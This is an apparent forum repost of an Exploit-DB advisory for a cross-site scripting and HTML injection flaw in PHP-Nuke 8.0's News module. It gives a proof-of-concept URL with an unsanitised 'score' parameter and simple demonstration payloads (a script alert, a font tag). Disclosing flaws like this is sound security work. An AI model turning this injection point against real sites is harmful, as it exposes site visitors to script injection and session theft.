Exploit PHP-Nuke 8.0 - News Module Cross-Site Scripting / HTML Code Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10293
Проверка EDB
  1. Пройдено
Автор
K053
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-11-27
Код:
# Software Link: http://www.phpnuke.org/modules.php?name=Downloads&d_op=viewdownload&cid=1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
note :

This bug found by tampering passed data .
coders don't sanitize and check user entry point for news rate.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POC:

http://server/modules.php?name=News&op=rate_complete&sid=6&score=[insert ur code here]

1. xss : <SCRIPT>alert(/XSS/.source)</SCRIPT>
2. Html code injection : <font color=red>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
Источник
www.exploit-db.com

Похожие темы